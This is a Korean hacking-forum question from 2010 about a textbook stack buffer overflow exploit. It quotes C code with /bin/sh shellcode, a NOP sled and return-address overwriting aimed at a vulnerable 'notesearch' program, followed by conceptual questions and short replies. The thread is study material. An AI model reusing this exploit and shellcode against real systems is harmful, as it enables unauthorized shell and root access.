시스템 해킹

1574,

3/79

부왁몬

답변좀요 ㅠ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1430 [복사]

음.. 일단 이 코드는 해킹 공격의 예술 책에 나온 소스코드인데요..

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}

입니다. 여기서 이해가 안가는 부분이 4가지가 있는데요..

1. i주소에서 offset 을 뺀 이유가  뭔가요?

2. offset 은 왜 270 인가 ?

3. char * buffer 와 command 는 동적으로 할당되기 때문에 스택이 아닌 힙에 할당되는 것 아닌가요?

그런데 왜 오프셋은 270이나 되나요 ?

4.이 프로그램의 메모리 구조가 궁금한데요

책에서보면 썰매(NOP)를 이용해서 쉘코드를 실행시킨다고 나와있습니다. 그러면

ret 주소를 썰매(NOP)가 있는 주소로 바꾼다 -> ret주소를 실행해 썰매를 탄다 -> 쉘코드가 실행된다.

이렇게되면 메모리구조는

(높은주소)------------ (낮은주소)

            ret ----NOP----쉘코드

이렇게 되나요?

질문이 많지만 답변부탁드려요 ㅠ

Hit : 3046 Date : 2010/10/02 08:51


kaca2100	힙메모리는 낮은주소에서 높은주소로 올라갑니다 . 스택과 반대 .	2010/10/02
부왁몬	ㄴ 아 그렇군요.. 근데 책에보니까 NOP 쉘코드 리턴주소반복 순서라는데 저 프로그램이 실행되면 ret값을 NOP의 주소로 덮어씌워서 쉘코드를 실행시킨다고 하는데요. 프로그램이 실행되면 ret 주소는 언제쓰고 ret주소를 먼저 덮어야되는데 왜 리턴주소 반복이 뒤에잇나용??	2010/10/02
프라이드	오우 힙오버플로우라 ㅋㅋ	2010/10/02
k1rha	프로그램이 실행될때 코드의 문제점을 이용해서 RET 주소에 자기가 원하는 리턴주소를 써주는겁니다. NOP 코드는.. 정확한 주소를 찍을수 없기떄문에.. 프로그램을 그냥 흘려서 맞춰주는거구요	2010/10/06